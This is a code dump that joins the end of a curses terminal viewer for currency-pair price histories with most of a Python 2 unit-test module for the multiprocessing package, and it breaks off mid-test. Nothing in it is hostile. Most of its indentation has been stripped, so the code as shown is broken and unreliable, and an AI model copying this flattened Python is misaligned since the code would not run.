# GUI Rendering.
def render_boxes(screen, my, mx, reverse):
pair_count = len(pairs)
box_height = my // pair_count
for i, pair in enumerate(pairs):
ystart = box_height * i
win = curses.newwin(box_height, mx, ystart, 0)
win.addstr(0, 0, "-" * mx)
win.addstr(1, 0, pair.center(mx))
try:
prices = [1 / h[1] if reverse else h[1]
for h in histories[pair]]
data = (" " * 4).join([
f"{min(prices)}",
f"{sum(prices) / len(prices)}",
f"{max(prices)}",
]).center(mx)
prices = [h[1] if reverse else 1 / h[1]
for h in histories[pair]]
rdata = (" " * 4).join([
f"{max(prices)}",
f"{sum(prices) / len(prices)}",
f"{min(prices)}",
]).center(mx)
if pair in updated:
win.addstr(2, 0, data, curses.A_BOLD)
win.addstr(3, 0, rdata, curses.A_BOLD)
else:
win.addstr(2, 0, data)
win.addstr(3, 0, rdata)
except (IndexError, ValueError):
pass
win.addstr(4, 0, "-" * mx)
first_row = 5
for i in range(first_row, box_height):
try:
timestamp, forward = histories[pair][-(i - (first_row - 1))]
data = (" " * 4).join([
f"{timestamp}",
f"{forward}",
f"{1 / forward}",
]).center(mx - 1)
if pair in updated and i == first_row:
win.addstr(i, 0, data, curses.A_BOLD)
else:
win.addstr(i, 0, data)
except IndexError:
break
win.refresh()
def main(screen):
screen.nodelay(True)
reverse = True
while True:
key = screen.getch()
if key == ord("r"):
reverse = not reverse
elif key == ord("q"):
break
render_boxes(screen, *screen.getmaxyx(), reverse)
updated.clear()
screen.refresh()
time.sleep(1)
if __name__ == "__main__":
print("Loading Data")
try:
with open(histfile, "rb") as cmchistory:
histories = pickle.load(cmchistory)
    except Exception:
print("Failed to Load Data")
event = threading.Event()
thr = threading.Thread(target=do_tick, args=(event,))
thr.start()
try:
curses.wrapper(main)
except KeyboardInterrupt:
pass
finally:
event.set()
thr.join()
print("Saving Data")
with open(histfile, "wb") as cmchistory:
pickle.dump(histories, cmchistory)
|
test_multiprocessing.py
|
#!/usr/bin/env python
#
# Unit tests for the multiprocessing package
#
import unittest
import Queue
import time
import sys
import os
import gc
import signal
import array
import socket
import random
import logging
from test import test_support
from StringIO import StringIO
_multiprocessing = test_support.import_module('_multiprocessing')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
import threading
# Work around broken sem_open implementations
test_support.import_module('multiprocessing.synchronize')
import multiprocessing.dummy
import multiprocessing.connection
import multiprocessing.managers
import multiprocessing.heap
import multiprocessing.pool
from multiprocessing import util
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
#
#
#
latin = str
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double
except ImportError:
Structure = object
c_int = c_double = None
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
return
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
@classmethod
def _test_terminate(cls):
time.sleep(1000)
def test_terminate(self):
if self.TYPE == 'threads':
return
p = self.Process(target=self._test_terminate)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
p.terminate()
join = TimingWrapper(p.join)
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
# XXX sometimes get p.exitcode == 0 on Windows ...
#self.assertEqual(p.exitcode, -signal.SIGTERM)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
from multiprocessing import forking
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(Queue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(Queue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(Queue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(Queue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(Queue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(Queue.Empty, queue.get, False)
p.join()
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
return
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
if sys.version_info < (2, 5) and not hasattr(queue, 'task_done'):
self.skipTest("requires 'queue.task_done()' method")
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in xrange(4)]
for p in workers:
p.start()
for i in xrange(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
return
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
# wait for them all to sleep
for i in xrange(6):
sleeping.acquire()
# check they have all timed out
for i in xrange(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
# wait for them to all sleep
for i in xrange(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
time.sleep(DELTA)
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, None)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
        # Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
self.Process(target=self._test_event, args=(event,)).start()
self.assertEqual(wait(), True)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', range(10))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', range(10), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', range(10), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(range(10))
self.assertEqual(a[:], range(10))
b = self.list()
self.assertEqual(b[:], [])
b.extend(range(5))
self.assertEqual(b[:], range(5))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], range(10))
d = [a, b]
e = self.list(d)
self.assertEqual(
e[:],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[:], [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello']])
def test_dict(self):
d = self.dict()
indices = range(65, 70)
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
class _TestPool(BaseTestCase):
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, range(10)), map(sqr, range(10)))
self.assertEqual(pmap(sqr, range(100), chunksize=20),
map(sqr, range(100)))
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 0.2))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, range(10))
self.assertEqual(list(it), map(sqr, range(10)))
it = self.pool.imap(sqr, range(10))
for i in range(10):
self.assertEqual(it.next(), i*i)
self.assertRaises(StopIteration, it.next)
it = self.pool.imap(sqr, range(1000), chunksize=100)
for i in range(1000):
self.assertEqual(it.next(), i*i)
self.assertRaises(StopIteration, it.next)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, range(1000))
self.assertEqual(sorted(it), map(sqr, range(1000)))
it = self.pool.imap_unordered(sqr, range(1000), chunksize=53)
self.assertEqual(sorted(it), map(sqr, range(1000)))
def test_make_pool(self):
p = multiprocessing.Pool(3)
self.assertEqual(3, len(p._pool))
p.close()
p.join()
def test_terminate(self):
if self.TYPE == 'manager':
# On Unix a forked process increfs each shared object to
# which its parent process held a reference. If the
# forked process gets terminated then there is likely to
# be a reference leak. So to prevent
# _TestZZZNumberOfObjects from failing we skip this test
# when using a manager.
return
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
self.assertTrue(join.elapsed < 0.2)
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
countdown = 5
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
#
# Test that manager has expected number of shared objects left
#
class _TestZZZNumberOfObjects(BaseTestCase):
# Because test cases are sorted alphabetically, this one will get
# run after all the other tests for the manager. It tests that
# there have been no "reference leaks" for the manager's shared
# objects. Note the comment in _TestPool.test_terminate().
ALLOWED_TYPES = ('manager',)
def test_number_of_objects(self):
EXPECTED_NUMBER = 1 # the pool object is still alive
multiprocessing.active_children() # discard dead process objs
gc.collect() # do garbage collection
refs = self.manager._number_of_objects()
debug_info = self.manager._debug_info()
if refs != EXPECTED_NUMBER:
print self.manager._debug_info()
print debug_info
self.assertEqual(refs, EXPECTED_NUMBER)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in xrange(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('next', '__next__')
def __iter__(self):
return self
def next(self):
return self._callmethod('next')
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
manager.shutdown()
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = Queue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
queue.put(('hello world', None, True, 2.25))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=('localhost', 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
